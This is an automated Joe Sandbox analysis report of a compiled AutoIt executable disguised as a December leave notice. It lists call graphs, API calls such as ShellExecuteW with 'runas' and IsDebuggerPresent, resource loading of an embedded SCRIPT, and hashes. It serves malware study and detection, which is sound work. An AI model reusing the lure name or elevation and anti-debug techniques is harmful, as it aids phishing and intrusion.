97193 f9c15c 48 API calls 97180->97193 97194 f9becb 335 API calls 97180->97194 97200 f8dcae 50 API calls Mailbox 97180->97200 97201 fdccdc 48 API calls 97180->97201 97202 fca1eb 50 API calls 97180->97202 97181->97169 97212 fccc5c 86 API calls 4 library calls 97181->97212 97182 ff715f 97182->97174 97204 fdccdc 48 API calls 97182->97204 97184 ff71ce 97185 f9c050 48 API calls 97184->97185 97187 ff71d6 97185->97187 97186 ff71ab 97186->97173 97186->97184 97187->97181 97188 ff7313 97187->97188 97211 fccc5c 86 API calls 4 library calls 97188->97211 97190->97180 97191->97180 97192->97180 97193->97180 97194->97180 97195->97169 97196->97128 97197->97122 97198->97180 97199->97169 97200->97180 97201->97180 97202->97180 97203->97182 97204->97182 97205->97186 97206->97141 97207->97169 97208->97160 97209->97169 97210->97169 97211->97169 97212->97169 97213->97169 97214->97169 97215->97169 97216->97169 97217->97135 97218 f8ef80 97219 f93b70 335 API calls 97218->97219 97220 f8ef8c 97219->97220 97221 ff9c06 97232 f9d3be 97221->97232 97223 ff9c1c 97225 ff9c91 Mailbox 97223->97225 97241 f81caa 49 API calls 97223->97241 97226 f93200 335 API calls 97225->97226 97227 ff9cc5 97226->97227 97230 ffa7ab Mailbox 97227->97230 97243 fccc5c 86 API calls 4 library calls 97227->97243 97229 ff9c71 97229->97227 97242 fcb171 48 API calls 97229->97242 97233 f9d3ca 97232->97233 97234 f9d3dc 97232->97234 97244 f8dcae 50 API calls Mailbox 97233->97244 97236 f9d40b 97234->97236 97237 f9d3e2 97234->97237 97245 f8dcae 50 API calls Mailbox 97236->97245 97239 f9f4ea 48 API calls 97237->97239 97240 f9d3d4 97239->97240 97240->97223 97241->97229 97242->97225 97243->97230 97244->97240 97245->97240 97246 f83742 97247 f8374b 97246->97247 97248 f837c8 97247->97248 97249 f83769 97247->97249 97284 f837c6 97247->97284 97253 f837ce 97248->97253 97254 ff1e00 97248->97254 97250 f8382c PostQuitMessage 97249->97250 97251 f83776 97249->97251 97287 f837b9 97250->97287 97256 ff1e88 97251->97256 97257 f83781 97251->97257 97252 f837ab DefWindowProcW 97252->97287 97258 f837d3 97253->97258 97259 f837f6 SetTimer RegisterWindowMessageW 97253->97259 97301 f82ff6 16 API calls 97254->97301 97306 fc4ddd 60 API calls _memset 97256->97306 97263 f83789 97257->97263 97264 f83836 97257->97264 97260 f837da KillTimer 97258->97260 97261 ff1da3 97258->97261 97265 f8381f CreatePopupMenu 97259->97265 97259->97287 97298 f83847 Shell_NotifyIconW _memset 97260->97298 97273 ff1ddc MoveWindow 97261->97273 97274 ff1da8 97261->97274 97262 ff1e27 97302 f9e312 335 API calls Mailbox 97262->97302 97269 ff1e6d 97263->97269 97270 f83794 97263->97270 97291 f9eb83 97264->97291 97265->97287 97269->97252 97305 fba5f3 48 API calls 97269->97305 97276 ff1e58 97270->97276 97285 f8379f 97270->97285 97271 ff1e9a 97271->97252 97271->97287 97273->97287 97277 ff1dac 97274->97277 97278 ff1dcb SetFocus 97274->97278 97275 f837ed 97299 f8390f DeleteObject DestroyWindow Mailbox 97275->97299 97304 fc55bd 70 API calls _memset 97276->97304 97282 ff1db5 97277->97282 97277->97285 97278->97287 97300 f82ff6 16 API calls 97282->97300 97283 ff1e68 97283->97287 97284->97252 97285->97252 97303 f83847 Shell_NotifyIconW _memset 97285->97303 97289 ff1e4c 97290 f84ffc 67 API calls 97289->97290 97290->97284 97292 f9eb9a _memset 97291->97292 97293 f9ec1c 97291->97293 97294 f851af 50 API calls 97292->97294 97293->97287 97296 f9ebc1 97294->97296 97295 f9ec05 KillTimer SetTimer 97295->97293 97296->97295 97297 ff3c7a Shell_NotifyIconW 97296->97297 97297->97295 97298->97275 97299->97287 97300->97287 97301->97262 97302->97285 97303->97289 97304->97283 97305->97284 97306->97271

                                                      Executed Functions

                                                      Function 00FAB043 Relevance: 21.5, APIs: 14, Instructions: 537COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 643 fab043-fab080 call faf8a0 646 fab089-fab08b 643->646 647 fab082-fab084 643->647 649 fab0ac-fab0d9 646->649 650 fab08d-fab0a7 call fa7bda call fa7c0e call fa6e10 646->650 648 fab860-fab86c call faa70c 647->648 651 fab0db-fab0de 649->651 652 fab0e0-fab0e7 649->652 650->648 651->652 655 fab10b-fab110 651->655 656 fab0e9-fab100 call fa7bda call fa7c0e call fa6e10 652->656 657 fab105 652->657 661 fab11f-fab12d call fb3bf2 655->661 662 fab112-fab11c call faf82f 655->662 691 fab851-fab854 656->691 657->655 672 fab44b-fab45d 661->672 673 fab133-fab145 661->673 662->661 677 fab7b8-fab7d5 WriteFile 672->677 678 fab463-fab473 672->678 673->672 676 fab14b-fab183 call fa7a0d GetConsoleMode 673->676 676->672 696 fab189-fab18f 676->696 684 fab7e1-fab7e7 GetLastError 677->684 685 fab7d7-fab7df 677->685 681 fab55a-fab55f 678->681 682 fab479-fab484 678->682 686 fab663-fab66e 681->686 687 fab565-fab56e 681->687 689 fab48a-fab49a 682->689 690 fab81b-fab833 682->690 692 fab7e9 684->692 685->692 686->690 700 fab674 686->700 687->690 694 fab574 687->694 697 fab4a0-fab4a3 689->697 698 fab83e-fab84e call fa7c0e call fa7bda 690->698 699 fab835-fab838 690->699 695 fab85e-fab85f 691->695 693 fab7ef-fab7f1 692->693 701 fab7f3-fab7f5 693->701 702 fab856-fab85c 693->702 703 fab57e-fab595 694->703 695->648 704 fab199-fab1bc GetConsoleCP 696->704 705 fab191-fab193 696->705 706 fab4e9-fab520 WriteFile 697->706 707 fab4a5-fab4be 697->707 698->691 699->698 708 fab83a-fab83c 699->708 709 fab67e-fab693 700->709 701->690 712 fab7f7-fab7fc 701->712 702->695 713 fab59b-fab59e 703->713 714 fab1c2-fab1ca 704->714 715 fab440-fab446 704->715 705->672 705->704 706->684 718 fab526-fab538 706->718 716 fab4cb-fab4e7 707->716 717 fab4c0-fab4ca 707->717 708->695 719 fab699-fab69b 709->719 723 fab7fe-fab810 call fa7c0e call fa7bda 712->723 724 fab812-fab819 call fa7bed 712->724 725 fab5de-fab627 WriteFile 713->725 726 fab5a0-fab5b6 713->726 727 fab1d4-fab1d6 714->727 715->701 716->697 716->706 717->716 718->693 728 fab53e-fab54f 718->728 720 fab6d8-fab719 WideCharToMultiByte 719->720 721 fab69d-fab6b3 719->721 720->684 732 fab71f-fab721 720->732 729 fab6c7-fab6d6 721->729 730 fab6b5-fab6c4 721->730 723->691 724->691 725->684 737 fab62d-fab645 725->737 734 fab5b8-fab5ca 726->734 735 fab5cd-fab5dc 726->735 738 fab36b-fab36e 727->738 739 fab1dc-fab1fe 727->739 728->689 740 fab555 728->740 729->719 729->720 730->729 743 fab727-fab75a WriteFile 732->743 734->735 735->713 735->725 737->693 746 fab64b-fab658 737->746 741 fab370-fab373 738->741 742 fab375-fab3a2 738->742 747 fab200-fab215 739->747 748 fab217-fab223 call fa1688 739->748 740->693 741->742 749 fab3a8-fab3ab 741->749 742->749 750 fab77a-fab78e GetLastError 743->750 751 fab75c-fab776 743->751 746->703 753 fab65e 746->753 754 fab271-fab283 call fb40f7 747->754 763 fab269-fab26b 748->763 764 fab225-fab239 748->764 756 fab3ad-fab3b0 749->756 757 fab3b2-fab3c5 call fb5884 749->757 761 fab794-fab796 750->761 751->743 758 fab778 751->758 753->693 773 fab289 754->773 774 fab435-fab43b 754->774 756->757 765 fab407-fab40a 756->765 757->684 777 fab3cb-fab3d5 757->777 758->761 761->692 768 fab798-fab7b0 761->768 763->754 770 fab23f-fab254 call fb40f7 764->770 771 fab412-fab42d 764->771 765->727 769 fab410 765->769 768->709 775 fab7b6 768->775 769->774 770->774 783 fab25a-fab267 770->783 771->774 778 fab28f-fab2c4 WideCharToMultiByte 773->778 774->692 775->693 780 fab3fb-fab401 777->780 781 fab3d7-fab3ee call fb5884 777->781 778->774 782 fab2ca-fab2f0 WriteFile 778->782 780->765 781->684 788 fab3f4-fab3f5 781->788 782->684 785 fab2f6-fab30e 782->785 783->778 785->774 787 fab314-fab31b 785->787 787->780 789 fab321-fab34c WriteFile 787->789 788->780 789->684 790 fab352-fab359 789->790 790->774 791 fab35f-fab366 790->791 791->780
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a7e6850cf813cb2f77cacad0a5e2d16c5f1f1dda778a5643a673997bf67fd897
                                                      • Instruction ID: 3cea8f90b48acffe618fe1b8871212c4111b89e2330c6b5de42331087d6282a8
                                                      • Opcode Fuzzy Hash: a7e6850cf813cb2f77cacad0a5e2d16c5f1f1dda778a5643a673997bf67fd897
                                                      • Instruction Fuzzy Hash: 0E325DB5E022288BCB25CF54DC816E9B7B5FF4A310F1841D9E40AA7A86D7349E81DF52
                                                      Function 00F83D19 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00F83AA3,?), ref: 00F83D45
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,?,00F83AA3,?), ref: 00F83D57
                                                      • GetFullPathNameW.KERNEL32(00007FFF,?,?,01041148,01041130,?,?,?,?,00F83AA3,?), ref: 00F83DC8
                                                        • Part of subcall function 00F86430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00F83DEE,01041148,?,?,?,?,?,00F83AA3,?), ref: 00F86471
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,00F83AA3,?), ref: 00F83E48
                                                      • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,010328F4,00000010), ref: 00FF1CCE
                                                      • SetCurrentDirectoryW.KERNEL32(?,01041148,?,?,?,?,?,00F83AA3,?), ref: 00FF1D06
                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0101DAB4,01041148,?,?,?,?,?,00F83AA3,?), ref: 00FF1D89
                                                      • ShellExecuteW.SHELL32(00000000,?,?,?,?,00F83AA3), ref: 00FF1D90
                                                        • Part of subcall function 00F83E6E: GetSysColorBrush.USER32(0000000F), ref: 00F83E79
                                                        • Part of subcall function 00F83E6E: LoadCursorW.USER32(00000000,00007F00), ref: 00F83E88
                                                        • Part of subcall function 00F83E6E: LoadIconW.USER32(00000063), ref: 00F83E9E
                                                        • Part of subcall function 00F83E6E: LoadIconW.USER32(000000A4), ref: 00F83EB0
                                                        • Part of subcall function 00F83E6E: LoadIconW.USER32(000000A2), ref: 00F83EC2
                                                        • Part of subcall function 00F83E6E: RegisterClassExW.USER32(?), ref: 00F83F30
                                                        • Part of subcall function 00F836B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F836E6
                                                        • Part of subcall function 00F836B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F83707
                                                        • Part of subcall function 00F836B8: ShowWindow.USER32(00000000,?,?,?,?,00F83AA3,?), ref: 00F8371B
                                                        • Part of subcall function 00F836B8: ShowWindow.USER32(00000000,?,?,?,?,00F83AA3,?), ref: 00F83724
                                                        • Part of subcall function 00F84FFC: _memset.LIBCMT ref: 00F85022
                                                        • Part of subcall function 00F84FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F850CB
                                                      Strings
                                                      • This is a third-party compiled AutoIt script., xrefs: 00FF1CC8
                                                      • runas, xrefs: 00FF1D84
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                      • String ID: This is a third-party compiled AutoIt script.$runas
                                                      • API String ID: 438480954-3287110873
                                                      • Opcode ID: e6341631d3e183218cda691bd54f93281d47476807ef6a8e64ef0fcaa534cd22
                                                      • Instruction ID: d058e690d029815853290491f6e5c45a3ef1427dd3bd4d5f55dc7ec48eb49f06
                                                      • Opcode Fuzzy Hash: e6341631d3e183218cda691bd54f93281d47476807ef6a8e64ef0fcaa534cd22
                                                      • Instruction Fuzzy Hash: E0516775E04248ABCF22BBF0DC85EED7B79AF04B00F004028F59166166DA7D6689EB30
                                                      Function 00F9DDC0 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1075 f9ddc0-f9de4f call f8d7f7 GetVersionExW call f86a63 call f9dfb4 call f86571 1084 ff24c8-ff24cb 1075->1084 1085 f9de55-f9de56 1075->1085 1086 ff24cd 1084->1086 1087 ff24e4-ff24e8 1084->1087 1088 f9de58-f9de63 1085->1088 1089 f9de92-f9dea2 call f9df77 1085->1089 1091 ff24d0 1086->1091 1092 ff24ea-ff24f3 1087->1092 1093 ff24d3-ff24dc 1087->1093 1094 f9de69-f9de6b 1088->1094 1095 ff244e-ff2454 1088->1095 1104 f9dea4-f9dec1 GetCurrentProcess call f9df5f 1089->1104 1105 f9dec7-f9dee1 1089->1105 1091->1093 1092->1091 1099 ff24f5-ff24f8 1092->1099 1093->1087 1100 ff2469-ff2475 1094->1100 1101 f9de71-f9de74 1094->1101 1097 ff245e-ff2464 1095->1097 1098 ff2456-ff2459 1095->1098 1097->1089 1098->1089 1099->1093 1106 ff247f-ff2485 1100->1106 1107 ff2477-ff247a 1100->1107 1102 f9de7a-f9de89 1101->1102 1103 ff2495-ff2498 1101->1103 1108 ff248a-ff2490 1102->1108 1109 f9de8f 1102->1109 1103->1089 1110 ff249e-ff24b3 1103->1110 1104->1105 1127 f9dec3 1104->1127 1112 f9df31-f9df3b GetSystemInfo 1105->1112 1113 f9dee3-f9def7 call f9e00c 1105->1113 1106->1089 1107->1089 1108->1089 1109->1089 1114 ff24bd-ff24c3 1110->1114 1115 ff24b5-ff24b8 1110->1115 1117 f9df0e-f9df1a 1112->1117 1123 f9df29-f9df2f GetSystemInfo 1113->1123 1124 f9def9-f9df01 call f9dff4 GetNativeSystemInfo 1113->1124 1114->1089 1115->1089 1119 f9df1c-f9df1f FreeLibrary 1117->1119 1120 f9df21-f9df26 1117->1120 1119->1120 1126 f9df03-f9df07 1123->1126 1124->1126 1126->1117 1129 f9df09-f9df0c FreeLibrary 1126->1129 1127->1105 1129->1117
                                                      APIs
                                                      • GetVersionExW.KERNEL32(?), ref: 00F9DDEC
                                                      • GetCurrentProcess.KERNEL32(00000000,0101DC38,?,?), ref: 00F9DEAC
                                                      • GetNativeSystemInfo.KERNELBASE(?,0101DC38,?,?), ref: 00F9DF01
                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F9DF0C
                                                      • FreeLibrary.KERNEL32(00000000,?,?), ref: 00F9DF1F
                                                      • GetSystemInfo.KERNEL32(?,0101DC38,?,?), ref: 00F9DF29
                                                      • GetSystemInfo.KERNEL32(?,0101DC38,?,?), ref: 00F9DF35
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                      • String ID:
                                                      • API String ID: 3851250370-0
                                                      • Opcode ID: 62ff2a320a1e682e9bebbfa3b5596f612c26f201baaa81ce0229c7518e926b4e
                                                      • Instruction ID: a03ee61ddc0fd8a770354f6097e89cfe1f89c65c73475132c040e2805c908c26
                                                      • Opcode Fuzzy Hash: 62ff2a320a1e682e9bebbfa3b5596f612c26f201baaa81ce0229c7518e926b4e
                                                      • Instruction Fuzzy Hash: A061C3B1C0A384DFDF15DFA898C11E97FB46F29304F2989D9D8459F20BC628C908DB65
                                                      Function 00F8406B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1147 f8406b-f84083 CreateStreamOnHGlobal 1148 f840a3-f840a6 1147->1148 1149 f84085-f8409c FindResourceExW 1147->1149 1150 ff4f16-ff4f25 LoadResource 1149->1150 1151 f840a2 1149->1151 1150->1151 1152 ff4f2b-ff4f39 SizeofResource 1150->1152 1151->1148 1152->1151 1153 ff4f3f-ff4f4a LockResource 1152->1153 1153->1151 1154 ff4f50-ff4f6e 1153->1154 1154->1151
                                                      APIs
                                                      • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00F8449E,?,?,00000000,00000001), ref: 00F8407B
                                                      • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00F8449E,?,?,00000000,00000001), ref: 00F84092
                                                      • LoadResource.KERNEL32(?,00000000,?,?,00F8449E,?,?,00000000,00000001,?,?,?,?,?,?,00F841FB), ref: 00FF4F1A
                                                      • SizeofResource.KERNEL32(?,00000000,?,?,00F8449E,?,?,00000000,00000001,?,?,?,?,?,?,00F841FB), ref: 00FF4F2F
                                                      • LockResource.KERNEL32(00F8449E,?,?,00F8449E,?,?,00000000,00000001,?,?,?,?,?,?,00F841FB,00000000), ref: 00FF4F42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                      • String ID: SCRIPT
                                                      • API String ID: 3051347437-3967369404
                                                      • Opcode ID: 28810d702ecce8a8a07d01928d53cb5b1bf018264eedd3555af8b8721149bdcc
                                                      • Instruction ID: 3f715181963548e18a9398ddea4f40f097f18423f4ccba292effb027491e8147
                                                      • Opcode Fuzzy Hash: 28810d702ecce8a8a07d01928d53cb5b1bf018264eedd3555af8b8721149bdcc
                                                      • Instruction Fuzzy Hash: 3D111871600701BFE7229BA5EC49F677BB9EBC5B61F10416CF64696294DA62EC009B30
                                                      Function 00FC6CA9 Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00FF2F49), ref: 00FC6CB9
                                                      • FindFirstFileW.KERNELBASE(?,?), ref: 00FC6CCA
                                                      • FindClose.KERNEL32(00000000), ref: 00FC6CDA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: FileFind$AttributesCloseFirst
                                                      • String ID:
                                                      • API String ID: 48322524-0
                                                      • Opcode ID: 2e6acb9309971b940629d4f158c5e6ec56ee9d991a8e2118f4f400280039009d
                                                      • Instruction ID: f87eb8a0743d7ebc7edc4041cdc311ff3a863a6417b7e83d631b69bd6b4e37b3
                                                      • Opcode Fuzzy Hash: 2e6acb9309971b940629d4f158c5e6ec56ee9d991a8e2118f4f400280039009d
                                                      • Instruction Fuzzy Hash: 20E0D831814411678220A7B8ED0E9EA376CDE0533AF100719F8B1C11C0EB79D90057E5
                                                      Function 00F93B70 Relevance: 2.2, Strings: 1, Instructions: 903COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throwstd::exception::exception
                                                      • String ID: @
                                                      • API String ID: 3728558374-2766056989
                                                      • Opcode ID: eceb2dbcf65761dd2e7568c44e0039e86190eeb58b4986c5707c7cde9601c79b
                                                      • Instruction ID: 5304b202a51465437b152457a7bbe11852bc9db0ee8671f6642ae6464872791c
                                                      • Opcode Fuzzy Hash: eceb2dbcf65761dd2e7568c44e0039e86190eeb58b4986c5707c7cde9601c79b
                                                      • Instruction Fuzzy Hash: CF72DF35E042099FEF14EF94C881EBEB7B5FF48310F14805AE909AB251D735AE45EB91
                                                      Function 00F93200 Relevance: 1.0, Instructions: 986COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: BuffCharUpper
                                                      • String ID:
                                                      • API String ID: 3964851224-0
                                                      • Opcode ID: 6ea6a44effa3ec8be281eef0b01ed37dd436091fc7968989a1d00bedb7e6a0f1
                                                      • Instruction ID: bcd92255ccc785f548c22eeb8ef22a5c4ea8ebd42cc637ea527edff843617573
                                                      • Opcode Fuzzy Hash: 6ea6a44effa3ec8be281eef0b01ed37dd436091fc7968989a1d00bedb7e6a0f1
                                                      • Instruction Fuzzy Hash: F9928C71A083419FEB24DF18C480B6AB7E1BF88314F14885DF98A8B362D775ED45EB52
                                                      Function 00F8E8D0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 816windowsleeptimeCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F8E959
                                                      • timeGetTime.WINMM ref: 00F8EBFA
                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F8ED2E
                                                      • TranslateMessage.USER32(?), ref: 00F8ED3F
                                                      • DispatchMessageW.USER32(?), ref: 00F8ED4A
                                                      • LockWindowUpdate.USER32(00000000), ref: 00F8ED79
                                                      • DestroyWindow.USER32 ref: 00F8ED85
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00F8ED9F
                                                      • Sleep.KERNEL32(0000000A), ref: 00FF5270
                                                      • TranslateMessage.USER32(?), ref: 00FF59F7
                                                      • DispatchMessageW.USER32(?), ref: 00FF5A05
                                                      • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00FF5A19
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                      • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                      • API String ID: 2641332412-570651680
                                                      • Opcode ID: cef8d56d8c36c14db46ac23fb458cb15b6460fb02eb7b6ffd2eaf01cc67ceeef
                                                      • Instruction ID: f4436fb93201fea7812037325f5dd41807d131b7bdd9fa087e4b70675ce14f98
                                                      • Opcode Fuzzy Hash: cef8d56d8c36c14db46ac23fb458cb15b6460fb02eb7b6ffd2eaf01cc67ceeef
                                                      • Instruction Fuzzy Hash: 6F625A71904344DFDB24EF64C885BEA77E4BF84710F04096DFA868B292D779E848EB52
                                                      Function 00FB5C78 Relevance: 47.9, APIs: 26, Strings: 1, Instructions: 626fileCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • ___createFile.LIBCMT ref: 00FB5EC3
                                                      • ___createFile.LIBCMT ref: 00FB5F04
                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00FB5F2D
                                                      • __dosmaperr.LIBCMT ref: 00FB5F34
                                                      • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 00FB5F47
                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 00FB5F6A
                                                      • __dosmaperr.LIBCMT ref: 00FB5F73
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00FB5F7C
                                                      • __set_osfhnd.LIBCMT ref: 00FB5FAC
                                                      • __lseeki64_nolock.LIBCMT ref: 00FB6016
                                                      • __close_nolock.LIBCMT ref: 00FB603C
                                                      • __chsize_nolock.LIBCMT ref: 00FB606C
